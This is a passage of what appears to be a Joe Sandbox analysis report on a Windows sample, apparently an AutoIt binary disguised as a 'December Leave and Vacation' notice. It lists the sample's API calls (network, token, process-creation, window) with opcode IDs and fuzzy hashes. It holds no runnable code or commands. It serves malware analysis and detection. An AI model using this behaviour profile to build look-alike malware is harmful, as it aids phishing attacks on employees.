                                                      • Opcode Fuzzy Hash: 5f0d6ee54b613c88b49dd30586598eca39caca18a14945681a7019af3f4817d7
                                                      • Instruction Fuzzy Hash: 31311E72D00108AFDB11EFA9DC459EFBBF9EF54310B10846AE815E3211DA359E45DBA0
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • GetCursorPos.USER32(?), ref: 00FEF211
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FFE4C0,?,?,?,?,?), ref: 00FEF226
                                                      • GetCursorPos.USER32(?), ref: 00FEF270
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FFE4C0,?,?,?), ref: 00FEF2A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: 78a3ad5e521b404820508eb0950a511ac8590f8ca6875ae591f89512fc22a616
                                                      • Instruction ID: 1c13843e7a7e94e47d50c6db52cef92e415025adf65292be56bfc9a8eec29cf2
                                                      • Opcode Fuzzy Hash: 78a3ad5e521b404820508eb0950a511ac8590f8ca6875ae591f89512fc22a616
                                                      • Instruction Fuzzy Hash: 6B21F339A00018EFDB268F95C888EFE7BB5FF49320F044069FA05872A5D3369D50EB60
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FD4358
                                                        • Part of subcall function 00FD43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FD4401
                                                        • Part of subcall function 00FD43E2: InternetCloseHandle.WININET(00000000), ref: 00FD449E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 1463438336-0
                                                      • Opcode ID: a8223574ee3a2c9f53cdbe6555d18a2b3f16c497b955e7dceae3265b9a2bc811
                                                      • Instruction ID: b57ae8fa209dda823726b4d7561d7b66e825aa228c1be2427796143ae23faed9
                                                      • Opcode Fuzzy Hash: a8223574ee3a2c9f53cdbe6555d18a2b3f16c497b955e7dceae3265b9a2bc811
                                                      • Instruction Fuzzy Hash: 1021A432600605BBDB129FA49C04F7BB7AAFF44710F18401BFA5597740DB76A821B7A0
                                                      APIs
                                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00FD8AE0
                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00FD8AF2
                                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00FD8AFF
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD8B16
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastacceptselect
                                                      • String ID:
                                                      • API String ID: 385091864-0
                                                      • Opcode ID: f0ea306507568f210609ff6be9adea092540cf51aa20b9057bdb020d9fe8fe6a
                                                      • Instruction ID: bab7ca53ee0d9e5afff98a741eb3d357518206789637ec0d26564df8afeb8044
                                                      • Opcode Fuzzy Hash: f0ea306507568f210609ff6be9adea092540cf51aa20b9057bdb020d9fe8fe6a
                                                      • Instruction Fuzzy Hash: 12216672A001249FC7219FA9CC85A9E7BFDEF49360F04416AF849D7381DB78D9419FA0
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00FE8AA6
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FE8AC0
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FE8ACE
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FE8ADC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      • Opcode ID: 42217c2a709e3946b7671fde0c614eee96b14f90dfe72440a1751fe3cbd60934
                                                      • Instruction ID: 1730e62a22e0f94a2f519325d695d56e55131c5364ed7719a0549a465e8e536e
                                                      • Opcode Fuzzy Hash: 42217c2a709e3946b7671fde0c614eee96b14f90dfe72440a1751fe3cbd60934
                                                      • Instruction Fuzzy Hash: 5611D031305111BFDB15BB58CC05FBA7799BF85760F154129F82AC72E2CF68AC0197A0
                                                      APIs
                                                        • Part of subcall function 00FC1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FC0ABB,?,?,?,00FC187A,00000000,000000EF,00000119,?,?), ref: 00FC1E77
                                                        • Part of subcall function 00FC1E68: lstrcpyW.KERNEL32(00000000,?,?,00FC0ABB,?,?,?,00FC187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FC1E9D
                                                        • Part of subcall function 00FC1E68: lstrcmpiW.KERNEL32(00000000,?,00FC0ABB,?,?,?,00FC187A,00000000,000000EF,00000119,?,?), ref: 00FC1ECE
                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FC187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FC0AD4
                                                      • lstrcpyW.KERNEL32(00000000,?,?,00FC187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FC0AFA
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00FC187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FC0B2E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: 099a989b82e1f2f8a9ee2bc87b6fcbccd040f8615c423f91ba47c57b0a769a55
                                                      • Instruction ID: b5e636648d263b0be217640210620f9d83b41ec0ebfcce488be2d6e3be4579ba
                                                      • Opcode Fuzzy Hash: 099a989b82e1f2f8a9ee2bc87b6fcbccd040f8615c423f91ba47c57b0a769a55
                                                      • Instruction Fuzzy Hash: 2C11B436500306EFDB259F64DC06E7A77A8FF85324B80402EE806CB255EF719851E7A0
                                                      APIs
                                                      • _free.LIBCMT ref: 00FB2FB5
                                                        • Part of subcall function 00FA395C: __FF_MSGBANNER.LIBCMT ref: 00FA3973
                                                        • Part of subcall function 00FA395C: __NMSG_WRITE.LIBCMT ref: 00FA397A
                                                        • Part of subcall function 00FA395C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,00F9F507,?,0000000E), ref: 00FA399F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 588465b3a8cb539542e7c5877f4680e9eb1ccc2c408205ecd5bcb9ee3858942e
                                                      • Instruction ID: 972f4d23271f509be49ee2a75803710376307b1ac388ee508c7b6a1b8dc307d8
                                                      • Opcode Fuzzy Hash: 588465b3a8cb539542e7c5877f4680e9eb1ccc2c408205ecd5bcb9ee3858942e
                                                      • Instruction Fuzzy Hash: A3110A72949315ABCB313BB5BC44BEA3B94AF053B4F204425F84996145DB39CD40BF90
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FC05AC
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FC05C7
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FC05DD
                                                      • FreeLibrary.KERNEL32(?), ref: 00FC0632
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                      • String ID:
                                                      • API String ID: 3137044355-0
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00FC6733
                                                      • _memset.LIBCMT ref: 00FC6754
                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00FC67A6
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FC67AF
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                      • String ID:
                                                      • API String ID: 1157408455-0
                                                      APIs
                                                        • Part of subcall function 00FBAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FBAA79
                                                        • Part of subcall function 00FBAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FBAA83
                                                        • Part of subcall function 00FBAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FBAA92
                                                        • Part of subcall function 00FBAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FBAA99
                                                        • Part of subcall function 00FBAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FBAAAF
                                                      • GetLengthSid.ADVAPI32(?,00000000,00FBADE4,?,?), ref: 00FBB21B
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FBB227
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FBB22E
                                                      • CopySid.ADVAPI32(?,00000000,?), ref: 00FBB247
                                                      Similarity
                                                      • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                      • String ID:
                                                      • API String ID: 4217664535-0
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FBB498
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FBB4AA
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FBB4C0
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FBB4DB
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00F9B5A5
                                                      • GetClientRect.USER32(?,?), ref: 00FFE69A
                                                      • GetCursorPos.USER32(?), ref: 00FFE6A4
                                                      • ScreenToClient.USER32(?,?), ref: 00FFE6AF
                                                      Similarity
                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 4127811313-0
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00FC7352
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00FC7385
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FC739B
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FC73A2
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2880819207-0
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9D1BA
                                                      • GetStockObject.GDI32(00000011), ref: 00F9D1CE
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9D1D8
                                                      Similarity
                                                      • API ID: CreateMessageObjectSendStockWindow
                                                      • String ID:
                                                      • API String ID: 3970641297-0
                                                      APIs
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      APIs
                                                        • Part of subcall function 00FA7A0D: __getptd_noexit.LIBCMT ref: 00FA7A0E
                                                      • __lock.LIBCMT ref: 00FA748F
                                                      • InterlockedDecrement.KERNEL32(?), ref: 00FA74AC
                                                      • _free.LIBCMT ref: 00FA74BF
                                                      • InterlockedIncrement.KERNEL32(018528C8), ref: 00FA74D7
                                                      Similarity
                                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                      • String ID:
                                                      • API String ID: 2704283638-0
                                                      APIs
                                                      • __lock.LIBCMT ref: 00FA7AD8
                                                        • Part of subcall function 00FA7CF4: __mtinitlocknum.LIBCMT ref: 00FA7D06
                                                        • Part of subcall function 00FA7CF4: EnterCriticalSection.KERNEL32(00000000,?,00FA7ADD,0000000D), ref: 00FA7D1F
                                                      • InterlockedIncrement.KERNEL32(?), ref: 00FA7AE5
                                                      • __lock.LIBCMT ref: 00FA7AF9
                                                      • ___addlocaleref.LIBCMT ref: 00FA7B17
                                                      Similarity
                                                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 1687444384-0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FEE33D
                                                      • _memset.LIBCMT ref: 00FEE34C
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01043D00,01043D44), ref: 00FEE37B
                                                      • CloseHandle.KERNEL32 ref: 00FEE38D
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3277943733-0
                                                      APIs
                                                        • Part of subcall function 00F9AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F9AFE3
                                                        • Part of subcall function 00F9AF83: SelectObject.GDI32(?,00000000), ref: 00F9AFF2
                                                        • Part of subcall function 00F9AF83: BeginPath.GDI32(?), ref: 00F9B009
                                                        • Part of subcall function 00F9AF83: SelectObject.GDI32(?,00000000), ref: 00F9B033
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00FEEA8E
                                                      • LineTo.GDI32(00000000,?,?), ref: 00FEEA9B
                                                      • EndPath.GDI32(00000000), ref: 00FEEAAB
                                                      • StrokePath.GDI32(00000000), ref: 00FEEAB9
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      • Opcode ID: c2c293e6f144e7f2a5cdee4f25ca0e843492572f6569a3c338b08228d04e508d
                                                      • Instruction ID: 211c9e5920993cfdb34229d6e0e41282d7303e5d1842d441a5f3abd894829e83
                                                      • Opcode Fuzzy Hash: c2c293e6f144e7f2a5cdee4f25ca0e843492572f6569a3c338b08228d04e508d
                                                      • Instruction Fuzzy Hash: 8FF0BE31001258BBDB239FD4AD09FCA3F19AF0A320F044101FE41600D5877E9551DBE5
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FBC84A
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FBC85D
                                                      • GetCurrentThreadId.KERNEL32 ref: 00FBC864
                                                      • AttachThreadInput.USER32(00000000), ref: 00FBC86B
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      • Opcode ID: a4afdbc73b751306baa3e07dd0f7fc24d403a4c9160dfaaf75cbcb0c13629e02
                                                      • Instruction ID: 0d57e1db214e41689ae1b30ed4f61d9bd3583d9bed2e3fb01333e7d9112e26a7
                                                      • Opcode Fuzzy Hash: a4afdbc73b751306baa3e07dd0f7fc24d403a4c9160dfaaf75cbcb0c13629e02
                                                      • Instruction Fuzzy Hash: 80E03971542228BADB221BE2AC0DEDB7F1CEF0A7A1F008021B64985440C6B6C580DBF0
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 00FBB0D6
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FBAC9D), ref: 00FBB0DD
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FBAC9D), ref: 00FBB0EA
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FBAC9D), ref: 00FBB0F1
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 136b515951574b63abb6269f78303d4e8fd9c3dc7176c34f0884ea378482c923
                                                      • Instruction ID: 2eae5561aee0ec24ad3e9b1c255ad5d7eb99539be2fc91c23e76e3186a981b86
                                                      • Opcode Fuzzy Hash: 136b515951574b63abb6269f78303d4e8fd9c3dc7176c34f0884ea378482c923
                                                      • Instruction Fuzzy Hash: 4CE04F72A01211ABD7316FF25C0CB973BA8AF557E2F018828B285D6044DA6984018B70
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00F9B496
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00F9B4A0
                                                      • SetBkMode.GDI32(?,00000001), ref: 00F9B4B5
                                                      • GetStockObject.GDI32(00000005), ref: 00F9B4BD
                                                      • GetWindowDC.USER32(?,00000000), ref: 00FFDE2B
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FFDE38
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00FFDE51
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00FFDE6A
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00FFDE8A
                                                      • ReleaseDC.USER32(?,00000000), ref: 00FFDE95
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      • Opcode ID: 204bf6e338d93cc373e7216594930177387630e7d1e60e929e1d8727ddddf28a
                                                      • Instruction ID: bcca0d120041c4abbe3daec4d7ad19a55344f5d45bcbb2bc38abb8d215d53cb2
                                                      • Opcode Fuzzy Hash: 204bf6e338d93cc373e7216594930177387630e7d1e60e929e1d8727ddddf28a
                                                      • Instruction Fuzzy Hash: E8E0ED31500244BAEF325FE8A80DBE83F11AB5533AF14C666FBA9580E5C7764591EB21
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FBB2DF
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00FBB2EB
                                                      • CloseHandle.KERNEL32(?), ref: 00FBB2F4
                                                      • CloseHandle.KERNEL32(?), ref: 00FBB2FC
                                                        • Part of subcall function 00FBAB24: GetProcessHeap.KERNEL32(00000000,?,00FBA848), ref: 00FBAB2B
                                                        • Part of subcall function 00FBAB24: HeapFree.KERNEL32(00000000), ref: 00FBAB32
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 7e172f7ebc9af63a353badcb96feed03cb57f52e054f562772ba3ec878999909
                                                      • Instruction ID: a8662e17e6b526e7651719ea99ee797205174ddeb9e8b72e02e5bf9d59492c31
                                                      • Opcode Fuzzy Hash: 7e172f7ebc9af63a353badcb96feed03cb57f52e054f562772ba3ec878999909
                                                      • Instruction Fuzzy Hash: 20E0BF36104005BBCB122BD5DC08859FF66FF983217109221F66581569CB379471EB61
                                                      APIs
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 1e9ce3a4b2e0ef35686a34a0c1dafa72e456e363eaea745f51b7e43b653e49f8
                                                      • Instruction ID: 9baafa1aa234af58dae041e2e8823ecaa76839186c2fb052f75db00e477cf117
                                                      • Opcode Fuzzy Hash: 1e9ce3a4b2e0ef35686a34a0c1dafa72e456e363eaea745f51b7e43b653e49f8
                                                      • Instruction Fuzzy Hash: 91E04FB1100204EFEB125FF0C84C62E7BA5EF4C360F11C805FD9A87200CB7998409B60
                                                      APIs
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 647e40c969dc04f934633e9e1c00cd70b12bb7fec85336089875158a60c412ad
                                                      • Instruction ID: 18678cd97606e555fe8edee6c33eae3537e105d4d1f50125af86e7ecf0df5d8f
                                                      • Opcode Fuzzy Hash: 647e40c969dc04f934633e9e1c00cd70b12bb7fec85336089875158a60c412ad
                                                      • Instruction Fuzzy Hash: B9E046B1500200EFEF129FF0C84862D7BA9EB4C3A0F118809F99E8B200CB7E98409B20
                                                      APIs
                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00FBDEAA
                                                      Strings
                                                      Similarity
                                                      • API ID: ContainedObject
                                                      • String ID: AutoIt3GUI$Container
                                                      • API String ID: 3565006973-3941886329
                                                      • Opcode ID: a7b92d838c2a2974c262252834391248e971d5d7740e3b4b4e87e4a24758787d
                                                      • Instruction ID: 0d9c5016e327b99fb3daa10cb786b5a5d41ba600a4a81d68690caca8e76c9ece
                                                      • Opcode Fuzzy Hash: a7b92d838c2a2974c262252834391248e971d5d7740e3b4b4e87e4a24758787d
                                                      • Instruction Fuzzy Hash: E8914670600601AFDB14DF65C884BAABBF9BF49710F24846DF84ACB691EB70E841DF61
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00F9BCDA
                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00F9BCF3
                                                      Strings
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: 03a63f1061dbfab51e8b9950a07c635f8c05b90f0552122dd71cb206115df6a6
                                                      • Instruction ID: f9900a1fe2313014e4c809ec2f50436e55cfa041e14b5d1ce7894cd26b01d763
                                                      • Opcode Fuzzy Hash: 03a63f1061dbfab51e8b9950a07c635f8c05b90f0552122dd71cb206115df6a6
                                                      • Instruction Fuzzy Hash: 16514271409744ABE760AF10DC86BABBBECFF98354F41484EF1C8411A6DF7584A8A752
                                                      APIs
                                                        • Part of subcall function 00F844ED: __fread_nolock.LIBCMT ref: 00F8450B
                                                      • _wcscmp.LIBCMT ref: 00FCC65D
                                                      • _wcscmp.LIBCMT ref: 00FCC670
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      • API String ID: 4029003684-3121273764
                                                      • Opcode ID: 4346c307528469d702f90beb6fc97ba47035f34a1da6444a8cee49ee2367353d
                                                      • Instruction ID: 34e35bbdef00348e90a658b3d818bfaacf878708e7df01a8c5708a0947fe1125
                                                      • Opcode Fuzzy Hash: 4346c307528469d702f90beb6fc97ba47035f34a1da6444a8cee49ee2367353d
                                                      • Instruction Fuzzy Hash: FE41C976A0020BBBDF10EAA4DD42FEF77B9AF49714F000469F605EB181D775AA04EB91
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00FEA85A
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FEA86F
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: b629fa7990500333a6879cd4d5872ee1bde1ae9de5a8dcfd185f0c0480815171
                                                      • Instruction ID: 05812470b9b6ca39f57721a1a0487577d10f245791c377ef90184313f7cd49c4
                                                      • Opcode Fuzzy Hash: b629fa7990500333a6879cd4d5872ee1bde1ae9de5a8dcfd185f0c0480815171
                                                      • Instruction Fuzzy Hash: FE412875E003499FDB14CFA9C880BDA7BB9FB08300F10016AE904AB381D770A941DFA1
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FD5190
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00FD51C6
                                                      Strings
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      • Opcode ID: 3d2c9b0f68874bc5a76c2bbad0749651fffc8eeb4d4f136d5fece792c147bea8
                                                      • Instruction ID: 52789f3d7b2c460012eb03e42afd7ede68c43cff073b8a6641035ecd33066c99
                                                      • Opcode Fuzzy Hash: 3d2c9b0f68874bc5a76c2bbad0749651fffc8eeb4d4f136d5fece792c147bea8
                                                      • Instruction Fuzzy Hash: 20311C71C00119ABCF11EFE4CC85AEE7FB9FF14750F140056F815A6266EB35AA46EBA0
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00FE980E
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00FE984A
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: 59f8f863232aaa8b1568731f9cfe657aa36ce5c92cc62de39386e6f9f9e30db6
                                                      • Instruction ID: 8b081ae535bb8d8681e12c69ed46c335889a28ea2e1dc2492948ae46b9aa9274
                                                      • Opcode Fuzzy Hash: 59f8f863232aaa8b1568731f9cfe657aa36ce5c92cc62de39386e6f9f9e30db6
